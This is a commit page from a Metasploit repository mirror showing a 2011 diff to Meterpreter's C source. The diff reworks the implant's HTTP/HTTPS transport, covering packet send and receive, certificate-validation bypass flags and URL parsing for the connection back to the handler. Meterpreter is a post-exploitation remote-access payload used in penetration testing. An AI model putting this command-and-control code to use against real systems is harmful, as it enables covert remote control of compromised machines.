adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Rework this for compatibility with older OSs

Browse Source 
git-svn-id: file:///home/svn/framework3/trunk@13045 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore
2011-06-28 07:30:48 +00:00
parent fdfaf5b17b
commit 3bb2a2d07f
3 changed files with 39 additions and 22 deletions
Download Patch File Download Diff File Expand all files Collapse all files
external/source/meterpreter/source/common/common.h
Vendored
+1 -1
View File
@@ -75,7 +75,7 @@ void real_dprintf(char *filename, int line, const char *function, char *format,
#define METERPRETER_TRANSPORT_HTTPS 2
// Enable debugging
// #define DEBUGTRACE 1
//#define DEBUGTRACE 1
#ifdef DEBUGTRACE
#define dprintf(...) real_dprintf(__VA_ARGS__)
external/source/meterpreter/source/common/core.c
Vendored
+24 -8
View File
@@ -1109,8 +1109,11 @@ DWORD packet_transmit_via_http_wininet(Remote *remote, Packet *packet, PacketReq
HINTERNET hRes;
DWORD retries = 5;
DWORD flags;
DWORD flen;
unsigned char *buffer;
flen = sizeof(flags);
buffer = malloc( packet->payloadLength + sizeof(TlvHeader) );
if (! buffer) {
SetLastError(ERROR_NOT_FOUND);
@@ -1122,19 +1125,28 @@ DWORD packet_transmit_via_http_wininet(Remote *remote, Packet *packet, PacketReq
do {
flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI;
flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI;
if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
flags |= INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID;
}
hReq = HttpOpenRequest(remote->hConnection, "POST", remote->uri, NULL, NULL, NULL, flags, 0);
if (hReq == NULL) {
dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError());
SetLastError(ERROR_NOT_FOUND);
break;
}
if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
InternetQueryOption( hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, &flen);
flags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_UNKNOWN_CA;
InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, flen);
}
retry_request:
retry_request:
hRes = HttpSendRequest(hReq, NULL, 0, buffer, packet->payloadLength + sizeof(TlvHeader) );
if (hRes == NULL && GetLastError() == ERROR_INTERNET_INVALID_CA && retries > 0) {
retries--;
@@ -1340,18 +1352,22 @@ DWORD packet_receive_http_via_wininet(Remote *remote, Packet **packet) {
PUCHAR payload = NULL;
ULONG payloadLength;
DWORD flags;
HINTERNET hReq;
HINTERNET hRes;
DWORD retries = 5;
dprintf("[PACKET RECEIVE] Acquiring lock");
lock_acquire( remote->lock );
do {
flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI;
flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI;
if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
flags |= INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID;
}
dprintf("[PACKET RECEIVE] HttpOpenRequest");
hReq = HttpOpenRequest(remote->hConnection, "POST", remote->uri, NULL, NULL, NULL, flags, 0);
if (hReq == NULL) {
dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError());
@@ -1372,7 +1388,7 @@ retry_request:
if (! hRes) {
dprintf("[PACKET RECEIVE] Failed HttpSendRequest: %d", GetLastError());
SetLastError(ERROR_NOT_FOUND);
SetLastError(ERROR_NOT_FOUND);
break;
}
@@ -1415,7 +1431,7 @@ retry_request:
// Allocate the payload
if (!(payload = (PUCHAR)malloc(payloadLength)))
{
SetLastError(ERROR_NOT_ENOUGH_MEMORY);
SetLastError(ERROR_NOT_ENOUGH_MEMORY);
break;
}
external/source/meterpreter/source/server/server_setup.c
Vendored
+14 -13
View File
@@ -388,8 +388,9 @@ static DWORD server_dispatch_http_wininet( Remote * remote )
URL_COMPONENTS bits;
DWORD ecount = 0;
DWORD delay = 0;
char tmpHostName[512];
char tmpUrlPath[1024];
if (global_expiration_timeout > 0)
remote->expiration_time = current_unix_timestamp() + global_expiration_timeout;
else
@@ -407,27 +408,27 @@ static DWORD server_dispatch_http_wininet( Remote * remote )
}
dprintf("[DISPATCH] Configured hInternet: 0x%.8x", remote->hInternet);
// The InternetCrackUrl method was poorly designed...
memset(tmpHostName, 0, sizeof(tmpHostName));
memset(tmpUrlPath, 0, sizeof(tmpUrlPath));
memset(&bits, 0, sizeof(bits));
bits.dwStructSize = sizeof(bits);
bits.dwSchemeLength = 1;
bits.dwHostNameLength = 1;
bits.dwUserNameLength = 1;
bits.dwPasswordLength = 1;
bits.dwUrlPathLength = 1;
bits.dwExtraInfoLength = 1;
bits.dwHostNameLength = sizeof(tmpHostName) -1;
bits.lpszHostName = tmpHostName;
bits.dwUrlPathLength = sizeof(tmpUrlPath) -1;
bits.lpszUrlPath = tmpUrlPath;
InternetCrackUrl(remote->url, 0, 0, &bits);
remote->uri = _strdup(bits.lpszUrlPath);
bits.lpszHostName[bits.dwHostNameLength] = 0;
remote->uri = _strdup(tmpUrlPath);
dprintf("[DISPATCH] Configured URL: %s", remote->uri);
dprintf("[DISPATCH] Host: %s Port: %u", bits.lpszHostName, bits.nPort);
dprintf("[DISPATCH] Host: %s Port: %u", tmpHostName, bits.nPort);
// Allocate the connection handle
remote->hConnection = InternetConnect(remote->hInternet, bits.lpszHostName, bits.nPort, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
remote->hConnection = InternetConnect(remote->hInternet, tmpHostName, bits.nPort, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (!remote->hConnection) {
dprintf("[DISPATCH] Failed InternetConnect: %d", GetLastError());
return 0;